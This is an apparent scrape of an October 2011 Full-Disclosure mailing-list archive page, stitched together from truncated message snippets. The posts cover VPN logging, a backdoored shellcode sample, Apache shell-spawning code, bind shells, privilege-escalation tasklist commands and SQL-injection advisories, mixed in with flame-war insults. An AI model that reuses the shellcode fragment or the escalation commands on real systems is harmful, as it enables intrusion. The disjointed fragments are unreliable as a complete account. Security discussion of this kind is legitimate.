http://vpn.hidemyass.com/vpncontrol/legal.html
VPN Data
What we store: Time stamp and IP address when you connect and
disconnect to our service.
...
Legalities
Anonymity services such as ours do not exist to hide people from
illegal activity. We will cooperate with law enforcement agencies if
and i will find you :)
he obv has a sshd scanner ready+waiting :)
there is code tho... just NOT that 1.
xd
On 4 October 2011 01:54, adam a...@papsy.net wrote:
/* KEEP PRIV8!! leak and i will find you :) ~ desg */
*
*
Probably should have been a good indication that he *wanted* you to run
Using an external VPN provider to cover your trace clearly shows your
incompetency and your idiot assumption.
Trying to blame the VPN provider rather than accepting your mistake and
learning from it clearly show your 3 years old mentality.
Also, could you please stop posting as GLOW Xd as well ?
maybe they are law abiding companies? :)
Who were advertising themselves, and acting like they would NEVER do the
dirty by handing over any payment records etc... wich is half the reason i
believe the people use theose ones, advertising to protect you.. not to give
your infos up, for really, no
perl -e 'print
here are places like codepad.org that let you compile/execute various
Indeed, i have seen the codepad.org execute action used on many many bots,
even opastebin just using download= and, renaming the downloaded file :s not
to hard, dfont even need to rename file, and, raw= featuires, is plain
On 10/03/2011 01:47 PM, Dimitris Glynos wrote:
As header field values are normally not included in HTTP transaction
logs, an attack based on this vulnerability may go unnoticed by web
server administrators.
A correction:
Although most header fields are not normally included in HTTP
/* Pardon my failure to thread this properly. I just subscribed so
future responses can be threaded properly. */
http://seclists.org/fulldisclosure/2011/Oct/22 reports vulnerabilities
in several themes based on the cumulus.swf file.
That file is not present in those themes in the format
Well, you should know that Koodhz is a great guy, a young man with lot of
ideals and he doesn't deserve to suffer the sentence. Koodhz has contributed
a lot to black hat hacking. Software as w3af could not work'd without the
active (but quiet) participation of this guy. So we ask you to help us
sorry supporting people returded enough to get busted is not in this years
budget..
try again in 2015
2011/10/4 Turro Sec turro...@gmail.com
Well, you should know that Koodhz is a great guy, a young man with lot of
ideals and he doesn't deserve to suffer the sentence. Koodhz has contributed
a
vTiger CRM 5.2.x = Multiple Cross Site Scripting Vulnerabilities
1. OVERVIEW
The vTiger CRM 5.2.1 and lower versions are vulnerable to Cross Site
Scripting. No fixed version has been released as of 2011-10-04.
2. BACKGROUND
vtiger CRM is a free, full-featured, 100% Open Source CRM software
You are an idiot.
On 4 October 2011 04:42, Antony widmal antony.wid...@gmail.com wrote:
Using an external VPN provider to cover your trace clearly shows your
incompetency and your idiot assumption.
Trying to blame the VPN provider rather than accepting your mistake and
learning from it
Ok, well I suppose we can avoid spamming the list with our off topic
ramblings and get back to the topic on hand (and behave like adults, which I
assume all of you'se are), and clear up a few things up.
VPN's and such can serve as a method to stop people on the local network
from sniffing your
Adam, thanks for the tip on Codepad, I am very grateful.
Is there actually a non backdoored variant of said code? I have not seen any
CVE mentioning that exploit so I was naturally wondering.
Also, pastebin/pastee based bots (those scanner kits especially) are not too
uncommon, I have found more
In my eyes, a couple of offtopic messages is ok, but a train of several
messages in less than an hour is what spam is...
I must admit I was pissed off at that time, and the fact that some people
failed to deal with such discussions appropriately only made it worse.
Next time, launch your own
Honestly, i dont use VPN, dont know alot about them, but when a company says
we will hide you..come to us.. , i guess some people take this, as a
meaning that they can commit crime, wich is obviously not the case... I dont
use VPN, I dont believe in them, i dont need them, and, I am NOT laurelai
On the piratebay.org dilemma for isps, i found this posted just *now*
(10pm,australian time)
Belgian ISPs Ordered To Block The Pirate Bay -
http://feed.torrentfreak.com/~r/Torrentfreak/~3/FMfrUHk1sZM/
Interesting developments regarding this.. I am using the RSS feed on TF to
keepup qwith this
well here in denmark they are also blocked
but as most other places it's a block on DNS level so it's very easy to get
around
2011/10/4 xD 0x41 sec...@gmail.com
On the piratebay.org dilemma for isps, i found this posted just *now*
(10pm,australian time)
Belgian ISPs Ordered To Block The
On 10/4/2011 7:36 AM, doc mombasa wrote:
well here in denmark they are also blocked
but as most other places it's a block on DNS level so it's very easy
to get around
2011/10/4 xD 0x41 sec...@gmail.com mailto:sec...@gmail.com
On the piratebay.org http://piratebay.org dilemma for isps, i
there is no such thing as bad publicity (especially for sites like TPB)
2011/10/4 Laurelai laure...@oneechan.org
On 10/4/2011 7:36 AM, doc mombasa wrote:
well here in denmark they are also blocked
but as most other places it's a block on DNS level so it's very easy to get
around
I believe they are supporting it.
On Oct 4, 2011 9:29 AM, Georgi Guninski gunin...@guninski.com wrote:
On Mon, Oct 03, 2011 at 02:22:42PM -0700, Laurelai wrote:
What tears? I don't even use those providers.
What a nice drivel in this thread :)))
btw, are Anonymous affiliated/supporting the
Title:
==
Canadian ISP Website - SQL Injection Vulnerability
Date:
=
2011-09-23
VL-ID:
=
282
Reference:
==
http://www.vulnerability-lab.com/get_content.php?id=282
Introduction:
=
Canadianisp.ca - Is a wholly owned project of Marc Bissonnette /
InternAlysis.
Title:
==
Prosieben Web Services - Multiple SQL Injection Vulnerabilities
Date:
=
2011-09-26
VL-ID:
=
284
Abstract:
=
The Vulnerability Lab Research Team discovered multiple remote SQL
Injection vulnerabilities on prosiebens - tvtotal vendor website.
Report-Timeline:
On Mon, Oct 03, 2011 at 02:22:42PM -0700, Laurelai wrote:
What tears? I don't even use those providers.
What a nice drivel in this thread :)))
btw, are Anonymous affiliated/supporting the usa protests aka
OccupyWallStreet?
all the usa needs is a revolution just before they go bankrupt :)
--
Unfortunately, on W7 and any other box with proper restrictions, you need to
run that command as admin to get the full result set.
If you are an unprivileged user looking for a process to escalate to:
tasklist /v /fi USERNAME ne %USERNAME%
or
tasklist /v| find Unknown N/A
Will give you a
Exploit Pack is an open source security framework developed by Juan
Sacco. It combines the benefits of a
JAVA GUI, Python as Engine and well-known exploits made by users. It
has a module editor to make the task of
developing new exploits easier, Instant Search and XML-based modules.
This open
So this is from the same people that developed Insect Pro?
Chris
On Tue, 04 Oct 2011 10:42:07 -0500, nore...@exploitpack.com wrote:
Exploit Pack is an open source security framework developed by Juan
Sacco. It combines the benefits of a
JAVA GUI, Python as Engine and well-known exploits
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
insecurityresearch.com (the Insect PRO site) does in fact seem to
redirect to exploitpack.com - nice catch Chris.
Justin Klein Keane
http://www.MadIrish.net
The digital signature on this e-mail may be confirmed using the
PGP key located at:
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
Just for those, who want to build their own apache shell code for
testing purposes, this snip might be of some use. It uses the still
open tcp connections to the server to spawn the shells, so that no
backconnect is needed. Of course, it does not give
Are there any ideas how to make the code more robust (currently
raciness due to frequent syscalls is problematid), smaller or add
features (I thought using the libc GOT, but this made code larger and
I do not know if that would make code much more portable)?
What about using
Supporting it would then mean, i guess there would be some kind of neat
cyber attacks happening on
wall street major shareholders :P or is it peaceful, sit in like this time
;P
hehe..
On 5 October 2011 01:34, Laurelai Storm laure...@oneechan.org wrote:
I believe they are supporting it.
On
Hi halfdog,
Just for those, who want to build their own apache shell code for
testing purposes, this snip might be of some use. It uses the still
open tcp connections to the server to spawn the shells, so that no
backconnect is needed. Of course, it does not give remote root but
only httpd
On 2011-10-04, at 02:43, Darren Martyn wrote:
Is there actually a non backdoored variant of said code? I have not seen any
CVE mentioning that exploit so I was naturally wondering.
You are assuming that there is some substance to the code *besides* being a
trojan/backdoor. Your assumption is
On 2011-10-04, at 14:39, Kai wrote:
Hi halfdog,
Just for those, who want to build their own apache shell code for
testing purposes, this snip might be of some use. It uses the still
open tcp connections to the server to spawn the shells, so that no
backconnect is needed. Of course, it does
There is ways to make it*say* things, like show system info etc on stdout,
without using that bug.. lookup a decent connectback shell, most perl ones
have fine stdinout and use printf or other means..
On 5 October 2011 08:39, Kai k...@rhynn.net wrote:
Hi halfdog,
Just for those, who want
could be used a very handy 'bind' shell tho...
On 5 October 2011 08:51, Andrew Farmer andf...@gmail.com wrote:
On 2011-10-04, at 14:39, Kai wrote:
Hi halfdog,
Just for those, who want to build their own apache shell code for
testing purposes, this snip might be of some use. It uses the
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
Hello Kai,
Kai wrote:
Hi halfdog,
Just for those, who want to build their own apache shell code
for testing purposes, this snip might be of some use. It uses the
still open tcp connections to the server to spawn the shells, so
that no
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
halfdog wrote:
Hello Kai, Kai wrote:
Hi halfdog,
Just for those, who want to build their own apache shell code
for testing purposes, this snip might be of some use. ...
wasn't that bug fixed a long ago?
On Tue, Oct 4, 2011 at 3:06 AM, Ferenc Kovacs tyr...@gmail.com wrote:
http://vpn.hidemyass.com/vpncontrol/legal.html
VPN Data
What we store: Time stamp and IP address when you connect and
disconnect to our service.
...
Legalities
Anonymity services such as ours do not exist to hide
I don't think it's supposed to be a secret. There are also references to
Insect Pro in the source code:
https://github.com/exploitpack/trunk/blob/master/Exploit%20Pack/src/com/exploitpack/main/License.java
BTW, you gotta love the scanner :)
XML Modules? In *my* exploit pack?
-Travis
On Tue, Oct 4, 2011 at 3:44 PM, Mario Vilas mvi...@gmail.com wrote:
I don't think it's supposed to be a secret. There are also references to
Insect Pro in the source code:
On 10/4/11 12:44 PM, Mario Vilas wrote:
I don't think it's supposed to be a secret. There are also
references to Insect Pro in the source code:
BTW, you gotta love the scanner :)
https://github.com/exploitpack/trunk/blob/master/Exploit%20Pack/src/com/exploitpack/scanner/ShowDialog.java
On Mon, Oct 3, 2011 at 5:48 PM, Laurelai laure...@oneechan.org wrote:
On 10/3/2011 12:37 PM, Jeffrey Walton wrote:
On Mon, Oct 3, 2011 at 5:21 PM, Laurelailaure...@oneechan.org wrote:
On 10/3/2011 12:16 PM, Ferenc Kovacs wrote:
On Mon, Oct 3, 2011 at 10:35 PM, Laurelailaure...@oneechan.org
Would you kindly die in a fire?
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
On Wed, 05 Oct 2011 08:55:07 +1100, xD 0x41 said:
could be used a very handy 'bind' shell tho...
I swear, bind shell code is like Our Friend The Beaver school essay
assignments - everybody ends up writing one, they all look the same, and almost
none are any good. ;)
pgpNwBO50cZVs.pgp
On Tue, 04 Oct 2011 20:01:26 EDT, Travis Biehn said:
XML Modules? In *my* exploit pack?
XML - the kudzu of the internet.
pgptYubnGpgKV.pgp
Description: PGP signature
___
Full-Disclosure - We believe in it.
Charter:
On Tue, 04 Oct 2011 03:15:02 EDT, Jeffrey Walton said:
On Tue, Oct 4, 2011 at 3:06 AM, Ferenc Kovacs tyr...@gmail.com wrote:
As I mentioned before it is hard to expect that a VPN provider will
risk his company for your $11.52/month, and maybe they would try it
for some lesser case, but
haha very true but, still a very good/easy and, often used as example code,
but, yes most are assignments usually :s and, actually seen as a featre for
some people, who like , tend to forget passes rofl :P
On 5 October 2011 11:53, valdis.kletni...@vt.edu wrote:
On Wed, 05 Oct 2011 08:55:07
(Option 3 - the guy heads downtown on a contempt of court charge - happens
so
rarely that it's basically a hypothetical).
You do realize that (at least in the US) - contempt is *not* a criminal
offense, don't you?
On Tue, Oct 4, 2011 at 8:05 PM, valdis.kletni...@vt.edu wrote:
On Tue, 04 Oct
On 10/4/2011 6:35 PM, adam wrote:
(Option 3 - the guy heads downtown on a contempt of court charge -
happens so
rarely that it's basically a hypothetical).
You do realize that (at least in the US) - contempt is *not* a
criminal offense, don't you?
On Tue, Oct 4, 2011 at 8:05 PM,
That actually depends on the situation, contempt can be criminal. And
frankly if you refuse a court order for information like that, the LE
officers will just seize it by gunpoint legally, then arrest you.
I'm curious as to what you think would cause contempt to be a criminal
offense, especially
On Tue, 04 Oct 2011 20:35:16 CDT, adam said:
(Option 3 - the guy heads downtown on a contempt of court charge - happens so
rarely that it's basically a hypothetical).
You do realize that (at least in the US) - contempt is *not* a criminal
offense, don't you?
tl;dr: Doesn't matter, you can
the judge can stick you in jail till you decide to change your mind.
That sums up the point entirely. In ALL of those cases, a judge deemed
[whatever] contempt - law enforcement *did not*.
On Tue, Oct 4, 2011 at 8:53 PM, valdis.kletni...@vt.edu wrote:
On Tue, 04 Oct 2011 20:35:16 CDT, adam
On 10/4/2011 6:50 PM, adam wrote:
That actually depends on the situation, contempt can be criminal. And
frankly if you refuse a court order for information like that, the LE
officers will just seize it by gunpoint legally, then arrest you.
I'm curious as to what you think would cause contempt
char evil[] =
xebx2ax5ex31xc0x88x46x07x88x46x0ax88x46x47x89
x76x49x8dx5ex08x89x5ex4dx8dx5ex0bx89x5ex51x89
x46x55xb0x0bx89xf3x8dx4ex49x8dx56x55xcdx80xe8
xd1xffxffxffx2fx62x69x6ex2fx73x68x23x2dx63x23
x2fx62x69x6ex2fx65x63x68x6fx20x77x30x30x30x74
This is ONCE you are actually in front, of the judge...remember, it may take
some breaking of civil liberty, for this to happen... or i maybe wrong.
cheers
xd
On 5 October 2011 15:10, Laurelai laure...@oneechan.org wrote:
On 10/4/2011 6:50 PM, adam wrote:
That actually depends on the
yer it is clarly leet stuff dude...
i ran it and got liek 2000k2.2.* apache user bot in a night! :P
hgehe (jkin)
funny tho.
xd
On 5 October 2011 13:09, VeNoMouS ve...@gen-x.co.nz wrote:
**
char evil[] =
\xeb\x2a\x5e\x31\xc0\x88\x46\x07\x88\x46\x0a\x88\x46\x47
http://www.justice.gov/usao/eousa/foia_reading_room/usam/title9/crm00754.htm
Did you actually read the link you pasted?
[...] and criminal penalties *may not be imposed on someone who has not
been afforded the protections* that the Constitution requires of such
criminal proceedings [...]
Wow, I'm extremely impressed with the support that the developer of this
exploit offers. I had been trying to get the exploit to work for about an
hour or so (couldn't get root on the target) and noticed that the developer
of this exploit logged into my machine (using an old account I must have
Its frightening how much power judges have, and how poorly they
are overseen.
Definitely agree there. Some of the civil cases are disgustingly bad, due to
there being no media attention and no real oversight. The civil case
mentioned above is a good example, and all of the excessive child support
On 10/4/2011 7:50 PM, Jeffrey Walton wrote:
On Tue, Oct 4, 2011 at 10:19 PM, xD 0x41sec...@gmail.com wrote:
This is ONCE you are actually in front, of the judge...remember, it may take
some breaking of civil liberty, for this to happen... or i maybe wrong.
cheers
Yep. Though some are
Good point Jeff, the real question is what does one do to fix it?
http://www.google.com/search?q=related:www.aclu.org
On Wed, Oct 5, 2011 at 12:00 AM, Laurelai laure...@oneechan.org wrote:
On 10/4/2011 7:50 PM, Jeffrey Walton wrote:
On Tue, Oct 4, 2011 at 10:19 PM, xD 0x41sec...@gmail.com
On 10/4/2011 7:52 PM, adam wrote:
Its frightening how much power judges have, and how poorly they
are overseen.
Definitely agree there. Some of the civil cases are disgustingly bad,
due to there being no media attention and no real oversight. The civil
case mentioned above is a good example,
I dunno china offers usa that kind of support all the time
. or so i heard
On Tue, 4 Oct 2011 21:41:08 -0500, adam wrote:
Wow, I'm extremely impressed with the support that the developer of
this exploit offers. I had been trying to get the exploit to work for
about an hour or
On Tue, 04 Oct 2011 22:04:40 CDT, adam said:
Good point Jeff, the real question is what does one do to fix it?
http://www.google.com/search?q=related:www.aclu.org
Amen to that. They're not perfect, but the ACLU and EFF are probably
among our best bets during these times.
pgpY26WQpOwbp.pgp
That raises a good question: could a good enough defense attorney convey
that point to a judge well enough to get the charges dismissed? Then again,
if they really believed a VPN service would protect them (even while
violating their agreement with said provider) - there's probably at least *
Amen to that. They're not perfect, but the ACLU and EFF are
probably among our best bets during these times.
Agreed. I know the ACLU gets a lot of flack for stepping on peoples' toes,
but no matter what their *alleged* agenda is - they've done a whole lot of
good that would have otherwise never
Yeah but the problem with China is that they're TOO dedicated, and all try
to log in at the same time to fix the problem, which ends up causing the
server to go down. It amazes me how big some of their hearts can be though.
On Tue, Oct 4, 2011 at 10:06 PM, VeNoMouS ve...@gen-x.co.nz wrote:
**
(using an old account I must have set up a while ago named w000t).
err..but, you ran it didnt you... so why would u need any old account :P
hehe... just... something wich i find strange.
I dont see any support would be good here :) lol i betting he does ONLy
patch to stop the thing being
I still think press drives many and more takedowns, and bends the arms of
others to.. for sure.
I know of a case here of petty crime, but is relevant ok, the guy had many
many, and big charges of murder,manslaughter, in other states within
australia, but was asked for his name, in 'vic' , wich
hmm.. yes interesting..
On the flip side would it be that hard for a malicious person who works at a
VPN provider to blame it on a customer? I don't think that's what has
happened in this case, but hypothetically what is to stop a rouge employee
from abusing the trust that a LE official might
Oh for sure, if it was not for these people really, none of those crimes
wich really did annoy us, would have happened.
So, i am all for them. and what theyre agenda is.
i guess, you just do not abuse things, and expect to be getting away with
it..
On 5 October 2011 14:34, adam a...@papsy.net
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
-
VMware Security Advisory
Advisory ID: VMSA-2011-0011
Synopsis: VMware hosted products address remote code execution
On Tue, Oct 4, 2011 at 9:04 PM, xD 0x41 sec...@gmail.com wrote:
...
This is where, as i was saying... a shell owner/employee, could easily make
any police run in circles simply trying to get a decent tap on something...
yeah, then they just take whole provider, e.g.:
On Sept. 22nd, Microsoft
74 matches
Mail list logo